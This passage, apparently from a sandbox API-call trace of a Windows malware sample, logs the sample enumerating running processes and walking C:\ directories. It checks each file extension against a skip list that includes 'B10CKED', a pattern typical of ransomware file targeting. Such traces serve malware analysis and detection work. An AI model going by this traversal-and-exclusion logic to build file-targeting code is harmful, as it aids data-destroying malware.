lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.330] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.331] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.332] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.333] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.334] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.336] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.337] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.440] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.441] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.443] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.444] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.445] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.446] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.447] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: 
lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.448] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.449] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.450] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.451] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.452] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0107.453] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0107.454] Process32NextW (in: hSnapshot=0xf4, lppe=0x12f944 | out: 
lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0107.455] CloseHandle (hObject=0xf4) returned 1 [0107.455] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0107.455] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 0x1c95c8 [0107.455] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW 
(in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0107.456] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.*", lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0x1c9608 [0107.456] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.456] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 1 [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.456] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: 
lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: 
lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\", cchLength=0x3e | out: lpsz="C:\\$RECYCLE.BIN\\S-1-5-21-3785418085-2572485238-895829336-1000\\") returned 0x3e [0107.457] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3785418085-2572485238-895829336-1000\\*.*", lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0x1c9648 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 0 [0107.457] FindClose (in: hFindFile=0x1c9648 | out: hFindFile=0x1c9648) returned 1 [0107.457] FindNextFileW (in: hFindFile=0x1c9608, lpFindFileData=0x12f6dc | out: lpFindFileData=0x12f6dc) returned 0 [0107.457] FindClose (in: hFindFile=0x1c9608 | out: hFindFile=0x1c9608) returned 1 [0107.458] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.458] 
CharUpperBuffW (in: lpsz="bat", cchLength=0x3 | out: lpsz="BAT") returned 0x3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="BAT", cchCount2=3) returned 1 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="BAT", cchCount2=3) 
returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="BAT", cchCount2=3) returned 3 [0107.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="BAT", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="BAT", cchCount1=3, lpString2="BAT", cchCount2=3) returned 2 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.459] CharUpperBuffW (in: lpsz="sys", cchLength=0x3 | out: lpsz="SYS") returned 0x3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="EXE", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="SYS", cchCount2=3) returned 3 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="SYS", cchCount2=3) returned 1 [0107.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="SYS", cchCount2=3) returned 2 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: 
lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] CharUpperBuffW (in: lpsz="C:\\Documents and Settings\\", cchLength=0x1a | out: lpsz="C:\\DOCUMENTS AND SETTINGS\\") returned 0x1a [0107.460] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*.*", lpFindFileData=0x12f6dc | out: 
lpFindFileData=0x12f6dc) returned 0xffffffff [0107.460] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.460] FindNextFileW (in: hFindFile=0x1c95c8, lpFindFileData=0x12f9a0 | out: lpFindFileData=0x12f9a0) returned 1 [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: lpsz="C:\\MSOCACHE\\") returned 0xc [0107.461] CharUpperBuffW (in: lpsz="C:\\MSOCache\\", cchLength=0xc | out: 